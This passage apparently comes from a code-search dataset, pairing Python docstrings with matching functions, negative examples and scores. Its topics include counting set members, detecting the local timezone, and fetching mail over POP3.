"def generator(self):\n\n # Each thread gets its own randomized set of keys\n keys = self.loader.keys()\n\n while True:\n random.shuffle(keys)\n data_batch = []\n label_batch = []\n\n for key in keys:\n data = self.loader.get(key)\n s = StringIO(data)\n img = PIL.Image.open(s)\n img = img.resize((224, 224))\n img = img.convert('RGB')\n data_batch.append(np.array(img))\n\n label_str = self._classname_from_key(key)\n label_int = self._classname_to_label[label_str]\n label_arr = np.zeros(self.num_classes())\n label_arr[label_int] = 1 # one-hot encoding\n label_batch.append(label_arr)\n\n if len(data_batch) == 32: # batch size\n yield np.array(data_batch), np.array(label_batch)\n data_batch = []\n label_batch = []",
"def wrapped_f(*args):\n input_docs = func(*args)\n output_doc_cnt = 0\n # split input_docs into chunks of size self.batch_size\n for batchiter in iter_n(input_docs, int(self.batch_size / len(self.input_types))):\n output_docs = self.key_lookup_batch(batchiter)\n for odoc in output_docs:\n # print debug information if the original id is the in the debug list\n if \"dt_debug\" in odoc:\n if isinstance(self.debug, list) and odoc[\"dt_debug\"][\"orig_id\"] in self.debug:\n self.logger.debug(\"DataTransform Debug doc['dt_debug']: {}\".format(odoc[\"dt_debug\"]))\n output_doc_cnt += 1\n yield odoc\n self.logger.info(\"wrapped_f Num. output_docs: {}\".format(output_doc_cnt))\n self.logger.info(\"DataTransform.histogram: {}\".format(self.histogram))",
"def gather_documents(self):\n self.document_gatherer.gather_and_save_everything(Constants.path_cord, \n Constants.path_metadata, \n Constants.path_linked_documents,\n Constants.path_unlinked_documents,\n Constants.path_parsed_documents,\n Constants.path_all_documents)\n \n print(\"Done gathering documents.\")"
] |
[
"0.59345233",
"0.58938026",
"0.57813835",
"0.57674474",
"0.57280785",
"0.5700913",
"0.56669515",
"0.5642201",
"0.5626246",
"0.56216335",
"0.5612161",
"0.5595699",
"0.5554058",
"0.5533326",
"0.5528166",
"0.5516686",
"0.5511766",
"0.5447907",
"0.54181635",
"0.54145205",
"0.5397193",
"0.5394273",
"0.5364344",
"0.5359191",
"0.53401023",
"0.53381723",
"0.5232529",
"0.5225127",
"0.52250063",
"0.5196127"
] |
0.6574284
|
0
|
Function that takes a counter and a set and returns the sum of counts for all items in that set
|
def number_in_set(c,s):
return sum(v for k,v in c.items() if k in s)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def countInSet(a, aSet):\n return sum(v for k, v in Counter(a).items() if k in aSet)",
"def sumSet(weightedSet):\n\tsum = 0\n\tfor example in weightedSet:\n\t\tsum += example.weight\n\treturn sum",
"def count(self, pset):\n return self._sets.count(pset)",
"def count(iterable):\n return sum(1 for whatever in iterable)",
"def count(iterable):\n\treturn sum(1 for _ in iterable)",
"def count(iterable):\n return sum(1 for _ in iterable)",
"def singles(counts):\n return (counts==1).sum()",
"def count(iterable: Iterable) -> int:\n return sum(1 for x in iterable)",
"def getCount(self, event):\n # Attempt 2: Still too slow\n count = 0\n \n for mEvent in self:\n if event.__st__(mEvent):\n count += 1\n \n return count\n \n # Attempt 1: Too slow\n #return reduce((lambda x, y: x+y),\n # map((lambda i: itemset <= i), self))",
"def k_ary_support_count(itemset, tagnamesdict):\n X = itemset[0]\n x_list = tagnamesdict[X]\n inter = set(x_list)\n\n for i in range(1, len(itemset)):\n Y = itemset[i]\n y_list = tagnamesdict[Y]\n inter = inter.intersection(y_list)\n\n support_count = len(inter)\n return support_count",
"def num_of_sets(l):\r\n distinct_sweets = set(l) #let's find all distinct sweets from input list\r\n dict_of = {} #empty dict to store key:value (sweet:number of occurrences)\r\n\r\n for i in distinct_sweets:\r\n dict_of[i] = l.count(i)\r\n \r\n key_min = min(dict_of.keys(), key=(lambda k: dict_of[k]))\r\n return dict_of[key_min]",
"def count(self, value=None):\r\n\t\t_set = list(set(self.sample))\r\n\t\tif value == None: return {_set[i]: self.sample.count(_set[i]) for i in range(len(_set))}\r\n\t\telse:\r\n\t\t\ttry: return {_set[i]: self.sample.count(_set[i]) for i in range(len(_set))}[value]\r\n\t\t\texcept: return 0",
"def total(init=5, *numbers, **keywords):\n count = init\n for number in numbers:\n count += number\n\n for key in keywords:\n count += keywords[key]\n\n return count",
"def count(x):\n return sum(len(y) for y in x)",
"def part_two(rucksacks: list) -> int:\n summ = 0\n for i in range(0, len(rucksacks), 3):\n first_group = set(rucksacks[i])\n second_group = set(rucksacks[i + 1])\n third_group = set(rucksacks[i + 2])\n badge = first_group.intersection(second_group).intersection(third_group)\n badge = list(badge)[0] # extract item id from set\n summ += PRIORITY.get(badge, 0)\n return summ",
"def group_count(counts, comp_ids):\n # binning\n for i in range(comp_ids.size):\n val = comp_ids[i]\n counts[val] += 1\n # inclusive scan\n total = 0\n for i in range(counts.size):\n ct = counts[i]\n counts[i] = ct + total\n total += ct",
"def part_one(rucksacks: list) -> int:\n summ = 0\n for rucksack in rucksacks:\n split_point = len(rucksack) // 2\n first = set(rucksack[:split_point])\n second = set(rucksack[split_point:])\n misplaced_item = list(first.intersection(second))[0]\n summ += PRIORITY.get(misplaced_item, 0)\n return summ",
"def compute_vocab_count(sents):\n counter = collections.Counter()\n for sentence in sents:\n counter.update(untag(sentence))\n return counter",
"def count(seq):\n\treturn sum(1 for x in seq)",
"def total(my_list, item):\n return my_list.count(item)",
"def __call__(self, uast):\n bag = defaultdict(int)\n for node in self.uast2graphlets(uast):\n bag[self.node2key(node)] += 1\n return bag",
"def total_count(count):\n return sum(count.values())",
"def counts(sequence):\n # initialize the countainer\n count = defaultdict(int)\n # iterates through sequence elements\n for item in sequence:\n # if element not in counts add 0\n # else add 1\n count[item] = count.get(item, 0) + 1\n return dict(count)",
"def solution_2(arr):\n total = 0\n for group in arr:\n group_list = []\n for person in group:\n group_list = group_list + person\n group_table = Counter(''.join(group_list))\n for k, v in group_table.items():\n if v == len(group):\n total += 1\n return total",
"def count_task1_group(answers):\n return len(set.union(*answers))",
"def sum_unique(l):\n pass",
"def count(self):\n return sum(1 for _ in self)",
"def doubles(counts):\n return (counts==2).sum()",
"def count_for(s, value):\n total = 0\n for elem in s:\n if elem == value:\n total = total + 1\n return total",
"def part_one(inp: defaultdict) -> int:\n result = set()\n color_queue = deque([\"shiny gold\"])\n while color_queue:\n for value in inp[color_queue.popleft()]:\n if value not in result:\n result.add(value)\n color_queue.append(value)\n return len(result)"
] |
[
"0.751714",
"0.6595445",
"0.6578135",
"0.63688713",
"0.63554883",
"0.62987095",
"0.62520295",
"0.61505234",
"0.611896",
"0.6113655",
"0.6109396",
"0.6081903",
"0.6042954",
"0.6038255",
"0.60293305",
"0.60198426",
"0.5956092",
"0.5953809",
"0.5915682",
"0.5913934",
"0.5906244",
"0.5900259",
"0.58895314",
"0.5864784",
"0.5851936",
"0.58257705",
"0.58021504",
"0.57733154",
"0.57694644",
"0.5752102"
] |
0.68980134
|
1
|
Get the ingredient spec.
|
def spec(self):
return self._spec
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_input_spec(self):\r\n return self.input_spec",
"def find_ingredient(self, ingredient_str):\n return self.find_doc('ingredient', 'name', self.get_unique_ingredients_name(ingredient_str))",
"def _get_spec(self, requirement_name):\n return Spec(','.join(self.versions_spec[requirement_name]))",
"def get_ingredient_props(self):\n return self.ing_pop",
"def recipe(self):\n return self.__recipe",
"def get_product_ingredients(self, driver):\n pass",
"def spec(self) -> Optional[pulumi.Input['PodDisruptionBudgetSpecArgs']]:\n return pulumi.get(self, \"spec\")",
"def extend_spec(self):\n return self._extend_spec",
"def instance_spec(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_spec\")",
"def instance_spec(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_spec\")",
"def element_spec(self):\n\n return self._element_spec",
"def get_spec_type(self):\r\n return self._spec_type",
"def GetRSpec(sliver_name):\n rec = sliver_name\n return rec.get('rspec', {}).copy()",
"def spec(self) -> \"VolumeAttachmentSpec\":\n return typing.cast(\n \"VolumeAttachmentSpec\",\n self._properties.get(\"spec\"),\n )",
"def instance_spec(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"instance_spec\")",
"def getIngredientImg(self, name):\n x0, y0, x1, y1 = ShoppingMode.getCellBounds(self, 0, 0)\n goalWidth = x1-x0\n \n path = ''\n img = None\n \n Ingredient = ShoppingMode.getIngredientObject(self, name)\n path = Ingredient.path \n img = self.loadImage(path)\n scaleFactor = ShoppingMode.findScaleFactor(self, img, goalWidth)\n img = self.scaleImage(img, scaleFactor)\n\n return img #returns the loaded image to store in the list in inventory",
"def get_specsheet(self):\n if hasattr(self, 'specsheet'):\n return self.specsheet",
"def _get_spec_info(self):\n raise NotImplementedError()",
"def __enter__(self):\n return self.spec",
"def required_slots(tracker: Tracker) -> List[Text]:\n\n return [\"ingredient\"]",
"def get_recipe_raw_definition(self):\n return self.recipe_settings",
"def get_weapon(self):\n\n return self.suggestion_set[1]",
"def ingredients(id):\n if id == \"\":\n return \"None\"\n else:\n try:\n return BreweryDb.beer(id + \"/ingredients\")['data']\n except Exception:\n return [{\"category\": \"\", \"name\": \"\"}]",
"def getIngredients():\n ingredients = ['Whiskey', 'Tequila', 'Vodka', 'Blue Curacao', 'Orange Juice',\n 'Pineapple Juice', 'Cranberry Juice', 'Sour Mix']\n return ingredients",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def spec(self) -> Optional[pulumi.Input[str]]:\n warnings.warn(\"\"\"Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\", DeprecationWarning)\n pulumi.log.warn(\"\"\"spec is deprecated: Field 'Spec' has been deprecated from provider version 1.205.0. IPv6 gateways do not distinguish between specifications. This parameter is no longer used.\"\"\")\n\n return pulumi.get(self, \"spec\")",
"def ingredients(post):\n try:\n if type(post) == Recipe:\n recipe = post\n else:\n recipe = Recipe.objects.get(id=post.id)\n return mark_safe(render_to_string('partial/ingredients.html', {'measurements': recipe.measurement_set.all()}))\n except Recipe.DoesNotExist:\n return \"\"",
"def __repr__(self):\n\n return \"<Ingredient ingredient_id=%d recipe_id=%s quantity=%s measure=%s item=%s prep_notes=%s>\" % (self.ingredient_id, self.recipe_id, self.quantity, self.measure, self.item, self.prep_notes)",
"def test_get_recipe_ingredients_by_id(self):\n pass",
"def recipe(self, recipe):\n import hxl.filters\n return hxl.filters.from_recipe(self, recipe)"
] |
[
"0.6274449",
"0.6177592",
"0.60568184",
"0.60404813",
"0.59850353",
"0.5973417",
"0.5872426",
"0.58190626",
"0.5700041",
"0.5700041",
"0.56123567",
"0.55838734",
"0.55769014",
"0.55754685",
"0.5558199",
"0.5453096",
"0.5428837",
"0.5402059",
"0.5395059",
"0.5375218",
"0.53725255",
"0.5357777",
"0.5318513",
"0.53079116",
"0.52961606",
"0.52961606",
"0.5291619",
"0.52645046",
"0.52457535",
"0.52131754"
] |
0.65218824
|
0
|
Sets the initial state of self, which includes the contents of sourceCollection, if it is present.
|
def __init__(self, sourceCollection = None):
self._size = 0
self._modCount = 0
if sourceCollection:
for item in sourceCollection:
self.add(item)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def __init__(self, sourceCollection = None):\n self._front = self._rear = None\n AbstractCollection.__init__(self, sourceCollection)",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source):\n\n self._source = source",
"def source(self, source: Source):\n self._source = source",
"def __init__(self, sourceCollection=None):\n self._items = Array(ArrayList.DEFAULT_CAPACITY)\n AbstractList.__init__(self, sourceCollection)",
"def update_source(self):\n if self.verbose:\n print(\"Updating source\")\n self.source.data = self.source_data\n if self.source.selected is not None:\n self.source.selected.indices = self.selection\n for c in self.callbacks[\"update_source\"]:\n c()\n self.pending_update = False\n if self.update_buffer is not None:\n self.context.doc.add_next_tick_callback(self.update_buffer)\n self.update_buffer = None",
"def set_source(self, source):\n self.data['source'] = source",
"def refresh_source(self):\n pass",
"def sources(self, sources):\n\n self._sources = sources",
"def populated_collection(self, empty_collection, plain_collection):\n raise NotImplementedError",
"def classified_sources(self, classified_sources):\n\n self._classified_sources = classified_sources",
"def _set_source(self, source):\n if source != self._source:\n self._source = source\n self._channel = \"\"\n self._channel_name = \"\"\n self._is_forced_val = True\n self._forced_count = 0",
"def _assign(self, source):\n if self._parent:\n oldZincRegion = self._zincRegion\n zincSiblingAfter = oldZincRegion.getNextSibling()\n else:\n oldZincRegion = None\n zincSiblingAfter = None\n self.freeContents()\n self._name = source._name\n # self._parent = source._parent should not be changed\n self._children = source._children\n for child in self._children:\n child._parent = self\n self._modelSources = source._modelSources\n self._zincRegion = source._zincRegion\n # self._ancestorModelSourceCreated is unchanged\n if self._parent:\n self._parent._zincRegion.removeChild(oldZincRegion)\n self._parent._zincRegion.insertChildBefore(self._zincRegion, zincSiblingAfter)",
"async def async_set_source(self, source):\n self._source = source\n #self.async_schedule_update_ha_state(True)",
"def __init__(self, source):\n self._source = source",
"def __init__(self,sourceCollection=None):\n self._item=list()\n AbstractDict.__init__(self,sourceCollection)",
"def set_source(self, source_name):\n self.source = source_name",
"def source(self, source):\n\n self._close()\n self._source = source\n\n self.src = rasterio.open(source)\n\n idx = getattr(self, 'indexes', None)\n if idx is None:\n self.indexes = list(range(1, self.src.count+1))",
"def _reset_collection(self):\r\n\r\n self._meta.queryset._document._collection = None\r\n self._meta.queryset._collection_obj = self._meta.queryset._document._get_collection()\r\n if hasattr(self._meta.queryset, '_reset_already_indexed'):\r\n self._meta.queryset._reset_already_indexed()",
"def source_id(self, source_id):\n\n self._source_id = source_id",
"def source_id(self, source_id):\n\n self._source_id = source_id",
"def source_contact(self, source_contact):\n \n self._source_contact = source_contact",
"def source(self, source: List[StateSchema]):\n if source is None:\n raise ValueError(\"Invalid value for `source`, must not be `None`\") # noqa: E501\n\n self._source = source",
"def _source_filename_field_was_properly_initialized(self):\n if not Rule.sources_list_is_initialized:\n Rule.sources_list.append(self.source)\n Rule.sources_list_is_initialized = True\n # print(f\"if {self.source} not in {Rule.sources_list}\")\n if self.source not in Rule.sources_list:\n # print(f\"In rule: {self}\")\n # print(f\"Rule.sources_list = {Rule.sources_list}\")\n raise UninitializedSourceError(f\"{repr(self.source)} not initialized.\")\n if self.target not in Rule.sources_list:\n Rule.sources_list.append(self.target)\n return True",
"def set_flow_source(self, source):\n self._source = source"
] |
[
"0.6834638",
"0.61755556",
"0.61755556",
"0.61755556",
"0.61755556",
"0.61755556",
"0.61755556",
"0.61755556",
"0.6115388",
"0.5937697",
"0.58528554",
"0.58218473",
"0.5799573",
"0.5783457",
"0.57636255",
"0.575177",
"0.56940144",
"0.5668226",
"0.56664675",
"0.56180024",
"0.55962116",
"0.55520076",
"0.55442584",
"0.5527246",
"0.55158293",
"0.55158293",
"0.5508826",
"0.5505585",
"0.5504841",
"0.54467446"
] |
0.7065542
|
0
|
We will attempt to get the local timezone of the server running the module and use that. If we can't get the timezone then we will set the default to be UTC. Linux has been tested and other operating systems should be OK; failures cause assumption of UTC. Windows is not supported and will assume UTC
|
def _get_local_tz(module, timezone='UTC'):
if platform.system() == 'Linux':
timedatectl = get_bin_path('timedatectl')
if timedatectl is not None:
rcode, stdout, stderr = module.run_command(timedatectl)
if rcode == 0 and stdout:
line = _findstr(stdout, 'Time zone')
full_tz = line.split(":", 1)[1].rstrip()
timezone = full_tz.split()[0]
return timezone
else:
module.warn('Incorrect timedatectl output. Timezone will be set to UTC')
else:
if os.path.exists('/etc/timezone'):
timezone = get_file_content('/etc/timezone')
else:
module.warn('Could not find /etc/timezone. Assuming UTC')
elif platform.system() == 'SunOS':
if os.path.exists('/etc/default/init'):
for line in get_file_content('/etc/default/init', '').splitlines():
if line.startswith('TZ='):
timezone = line.split('=', 1)[1]
return timezone
else:
module.warn('Could not find /etc/default/init. Assuming UTC')
elif re.match('^Darwin', platform.platform()):
systemsetup = get_bin_path('systemsetup')
if systemsetup is not None:
rcode, stdout, stderr = module.execute(systemsetup, '-gettimezone')
if rcode == 0 and stdout:
timezone = stdout.split(':', 1)[1].lstrip()
else:
module.warn('Could not run systemsetup. Assuming UTC')
else:
module.warn('Could not find systemsetup. Assuming UTC')
elif re.match('^(Free|Net|Open)BSD', platform.platform()):
if os.path.exists('/etc/timezone'):
timezone = get_file_content('/etc/timezone')
else:
module.warn('Could not find /etc/timezone. Assuming UTC')
elif platform.system() == 'AIX':
aix_oslevel = int(platform.version() + platform.release())
if aix_oslevel >= 61:
if os.path.exists('/etc/environment'):
for line in get_file_content('/etc/environment', '').splitlines():
if line.startswith('TZ='):
timezone = line.split('=', 1)[1]
return timezone
else:
module.warn('Could not find /etc/environment. Assuming UTC')
else:
module.warn('Cannot determine timezone when AIX os level < 61. Assuming UTC')
else:
module.warn('Could not find /etc/timezone. Assuming UTC')
return timezone
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _get_tz():\n return 'UTC'",
"def timezone():\n \n pass",
"def local_timezone() -> Timezone | FixedTimezone:\n return get_local_timezone()",
"def local_tz(self):\n return pytz.timezone(self.calendar.timezone)",
"def timezone():\n\n return time.timezone",
"def get_timezone():\n return dates.get_timezone(_get_tz())",
"def local_zone():\n return get_localzone()",
"def _getUTC(self, config = {} ):\n # Default implementation: get system local time\n return datetime.datetime.utcnow()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def test_guest_timezone(self):\n self.check_guest_timezone()",
"def get_timezone():\n localTimezone = request.args.get('timezone')\n if localTimezone in pytz.all_timezones:\n return localTimezone\n else:\n raise pytz.exceptions.UnknownTimeZoneError\n userId = request.args.get('login_as')\n localTimezone = users[int(userId)]['timezone']\n if localTimezone in pytz.all_timezones:\n return localTimezone\n else:\n raise pytz.exceptions.UnknownTimeZoneError\n return app.config['BABEL_DEFAULT_TIMEZONE']",
"def _convertTZ(self):\n tz = timezone.get_current_timezone()\n dtstart = self['DTSTART']\n dtend = self['DTEND']\n if dtstart.zone() == \"UTC\":\n dtstart.dt = dtstart.dt.astimezone(tz)\n if dtend.zone() == \"UTC\":\n dtend.dt = dtend.dt.astimezone(tz)",
"def _now():\n return datetime.now(timezone.utc).astimezone()",
"def _get_tzinfo(zonelabel):\n return moment.tzinfo(zonelabel) if zonelabel else _get_global_tz()",
"def time_zone():\n return timezone('Etc/GMT-10')",
"def nowUTC():\n return datetime.datetime.now(pytz.utc)"
] |
[
"0.7593437",
"0.70392257",
"0.68582565",
"0.68310165",
"0.6800011",
"0.6789667",
"0.6762175",
"0.67572707",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64839655",
"0.64806175",
"0.6460663",
"0.64227194",
"0.6400527",
"0.6396045",
"0.6384426"
] |
0.76198214
|
0
|
Connect to pop3 server and close the connection
|
def get_pop3_connectivity(self):
try:
if self.opt_use_ssl:
self.server = poplib.POP3_SSL(self.opt_pop3_server)
else:
self.server = poplib.POP3(self.opt_pop3_server)
except Exception as e:
raise Exception(
"Error connecting to %s with exception %s" %
(self.opt_pop3_server, str(e)))
else:
self.helper.log_debug(
'get_pop3_connectivity: successfully connected to %s' %
self.opt_pop3_server)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_pop3(self):\n self._endpointServerTest(\"pop3\", protocols.POP3Factory)",
"def connect_push(self):\n protocol, host, port = self.client_config.socket_host_port\n self.push_client = PushClient(host, port, (protocol == \"ssl\"))\n\n self.push_client.quote_changed = self.on_quote_change\n self.push_client.asset_changed = self.on_asset_change\n self.push_client.position_changed = self.on_position_change\n self.push_client.order_changed = self.on_order_change\n self.push_client.connect_callback = self.on_push_connected\n\n self.push_client.connect(\n self.client_config.tiger_id, self.client_config.private_key)",
"def test_endpointPOP3(self):\n self._endpointTest(\"pop3\")",
"def close(self): \n\t\tself.connection = None",
"def __init__(self, host, port = POP3_SSL_PORT,\r\n timeout=socket._GLOBAL_DEFAULT_TIMEOUT,\r\n username=None, password=None,\r\n certChain=None, privateKey=None,\r\n checker=None,\r\n settings=None):\r\n self.host = host\r\n self.port = port\r\n sock = socket.create_connection((host, port), timeout)\r\n ClientHelper.__init__(self,\r\n username, password,\r\n certChain, privateKey,\r\n checker,\r\n settings)\r\n connection = TLSConnection(sock) \r\n ClientHelper._handshake(self, connection)\r\n self.sock = connection\r\n self.file = self.sock.makefile('rb')\r\n self._debugging = 0\r\n self.welcome = self._getresp()",
"def reconnect(self):\n self.close()\n self.connect()",
"async def close_connection(self):\n\t\t...",
"def close(self):\n self._connection.close()",
"def close_connection(self):\r\n if self.conn:\r\n self.conn.close()",
"def close(self): \n self.connection.close()",
"def connect(self):\n\t\tif cint(self.settings.use_imap):\n\t\t\treturn self.connect_imap()\n\t\telse:\n\t\t\treturn self.connect_pop()",
"def close_connection(self):\n if self.socket:\n self.socket.close()",
"def close(self) :\n if self.ssh is not None :\n self.ssh.close()\n self.ssh = None\n self.connected = False",
"def _connect(self):\r\n self.sock = socket.socket()\r\n host = \"pubsub.pubnub.com\"\r\n port = 80\r\n if self.use_ssl:\r\n self.sock = ssl.wrap_socket(self.sock)\r\n port = 443\r\n self.sock.connect((host, port))\r\n self.connected = True",
"def disconnect(self):\n self.connection.close()",
"def close(self):\n self.should_connect = False\n self.retry = 0\n self.resp.close()",
"def close(self):\n if self.scp_conn:\n self.scp_conn.close()",
"def disconnect(conn):\n conn.close()",
"def close(self):\n self.connect.close()",
"def close_connection(self):\n self.nodesocket.close()",
"def close_connection(self):\n\n self._connection.close()\n print(\"Closed connection....\")",
"def close(self):\n if self.push_socket is not None:\n self.push_socket.close()\n\n if self.pull_socket is not None:\n self.pull_socket.close()\n\n if self.control_socket is not None:\n self.control_socket.close()",
"def connect(self):\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n if self.print_send:\n print(' - connecting...')\n self.socket.settimeout(1)\n self.socket.connect(self.host_port)\n if self.print_send:\n print(' - connected')\n except socket.timeout:\n raise Timeout('Timeout connecting to projector')\n except Exception as err:\n raise Error('Connection failed', err)\n self.expect(b'PJ_OK')\n self.send(b'PJREQ')\n self.expect(b'PJACK')",
"def close_connection(self):\n self.conn.close()",
"def remote_destroy(self):\r\n self.transport.loseConnection()",
"def close_connection(self):\n self.connection.close()",
"def close_connection(self):\n self.connection.close()",
"def _close_connection(self):\n if self.connection:\n self.connection.destroy()\n self.connection = None",
"def connect_to_rpc():\n provider = \"http://\"\n\n ip = input(\"IP of provider: \")\n provider += \"127.0.0.1\" if ip == \"\" else ip\n\n provider += \":\"\n\n port = input(\"Port of provider: \")\n provider += \"8545\" if port == \"\" else port\n\n print(\"Connecting to provider: \" + provider)\n web3 = Web3(HTTPProvider(provider))\n return web3",
"def close(self):\n if self.conn is not None:\n self.conn.close()\n self.conn = None"
] |
[
"0.6312033",
"0.5734185",
"0.5654881",
"0.5634933",
"0.56250674",
"0.56024295",
"0.557485",
"0.5563851",
"0.555122",
"0.5512034",
"0.549845",
"0.5483903",
"0.54780346",
"0.54713434",
"0.547061",
"0.54593366",
"0.5439628",
"0.5426821",
"0.5422101",
"0.54153687",
"0.5403732",
"0.5401667",
"0.53862226",
"0.5364972",
"0.5352949",
"0.53286636",
"0.53286636",
"0.53110164",
"0.5301738",
"0.53013444"
] |
0.7447212
|
0
|
Connect to pop3 server and return a list of ALL msg uids. Unlike the IMAP equivalent, filtering based on Subject is done elsewhere
|
def get_dmarc_messages(self):
messages = []
try:
if self.opt_use_ssl:
self.server = poplib.POP3_SSL(self.opt_pop3_server)
self.server.user(self.opt_global_account["username"])
self.server.pass_(self.opt_global_account["password"])
else:
self.server = poplib.POP3(self.opt_pop3_server)
self.server.user(self.opt_global_account["username"])
self.server.pass_(self.opt_global_account["password"])
except Exception as e:
raise Exception(
"Error connecting to %s with exception %s" %
(self.opt_pop3_server, str(e)))
else:
self.helper.log_debug(
'get_dmarc_messages: successfully connected to %s' %
self.opt_pop3_server)
messages = self.byte2str(self.server.uidl()[1])
self.helper.log_info(
'get_dmarc_messages: %d messages' %
len(messages))
return messages
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_messages(user, password, server=\"pop.gmail.com\"):\n\n # define our connection\n pop_conn = poplib.POP3_SSL(server)\n pop_conn.user(user)\n pop_conn.pass_(password)\n\n # Get message tuples from server:\n tuples = [pop_conn.retr(i) for i in range(1, len(pop_conn.list()[1]) + 1)]\n pop_conn.quit()\n\n # returns the message objects in a list, discarding the other fields\n return [msg[1] for msg in tuples]",
"def get_mailbox_uidls(mailbox):\r\n\r\n mbxfile = \"%s\\\\%s.mbx\" % (mailboxdir, mailbox)\r\n\r\n print \"Opening mbx: [%s]\" % mbxfile\r\n\r\n if not os.path.exists(mbxfile):\r\n return []\r\n\r\n fd = open(mbxfile)\r\n\r\n uidls=[]\r\n\r\n for line in fd.readlines():\r\n if line[0:7] == \"* UIDL:\":\r\n list = line.split(':')\r\n uidls.append( list[1].strip() )\r\n\r\n fd.close()\r\n\r\n return uidls\r\n\r\n \"\"\"This function returns a list of all of the uidl (unique id's) of\r\n all of the messages on the server \"\"\"",
"def fetch_mailbox((mailbox, host, user, passwd)):\r\n\r\n global text, attachments\r\n\r\n ## login to the pop3 server ==============================\r\n print\r\n print \"###### Connecting to %s\" % host\r\n M = poplib.POP3(host)\r\n M.set_debuglevel(1)\r\n M.user(user)\r\n M.pass_(getpass.getpass())\r\n\r\n ## create the mailbox and attachments directories if required\r\n if not os.path.exists (mailboxdir):\r\n print \"Creating Directory %s\", mailboxdir\r\n os.mkdir (mailboxdir)\r\n\r\n att_dir = \"%s\\\\att_%s\" % (mailboxdir, mailbox)\r\n if not os.path.exists (att_dir):\r\n print \"Creating Directory %s\", att_dir\r\n os.mkdir (att_dir)\r\n\r\n \r\n ## get list of uidls in the mailbox file =================\r\n uidls = get_mailbox_uidls(mailbox)\r\n\r\n ## get number of messages ================================\r\n numMessages = len(M.list()[1])\r\n print \"There are %d messages on the server\" % numMessages\r\n\r\n\r\n ## get uidls from server and compare with the uidls in the\r\n ## mailbox ===============================================\r\n uidls_srv = M.uidl()\r\n list = uidls_srv[1]\r\n fetchlist = []\r\n for item in list:\r\n msgno, uidl = item.split(' ')\r\n msgno = int(msgno)\r\n if not uidl in uidls:\r\n print \"Found new message: (%d, %s)\" % (msgno, uidl)\r\n fetchlist.append(msgno)\r\n\r\n print \"There are %d new messages on the server\" % len(fetchlist)\r\n\r\n alltext = \"\" ## this variable contains the mbox contents\r\n\r\n ## go over all of the emails =============================\r\n for i in fetchlist:\r\n\r\n flatmsg = \"\"\r\n\r\n ## retreive message\r\n# for line in M.retr(i+1)[1]:\r\n for line in M.retr(i)[1]:\r\n flatmsg += line + \"\\r\\n\"\r\n\r\n ## parse message\r\n msg = email.message_from_string (flatmsg)\r\n\r\n ## handle Email.message object\r\n title = handleMsg(mailbox, msg)\r\n\r\n\r\n msgtext = \"%s\\n%s* UIDL: %s\\n%s\\n\\n\" % (''.center(70,'#'), title, uidl, text)\r\n if not attachments == \"\":\r\n msgtext += \"#### Attachments:\\n%s\" % attachments\r\n\r\n alltext = msgtext.replace('\\r\\n','\\n') + alltext\r\n\r\n ## add 'alltext' to the beginning of the mailbox file ====\r\n mboxfile = \"%s\\\\%s.mbx\" % (mailboxdir, mailbox)\r\n contents = \"\"\r\n if os.path.exists(mboxfile):\r\n mbox = open(mboxfile, \"rt\")\r\n contents = mbox.read()\r\n mbox.close()\r\n\r\n mbox = open(mboxfile, \"wt\")\r\n mbox.write (alltext)\r\n if contents != \"\":\r\n mbox.write (contents)\r\n\r\n mbox.close()\r\n\r\n return len(fetchlist)",
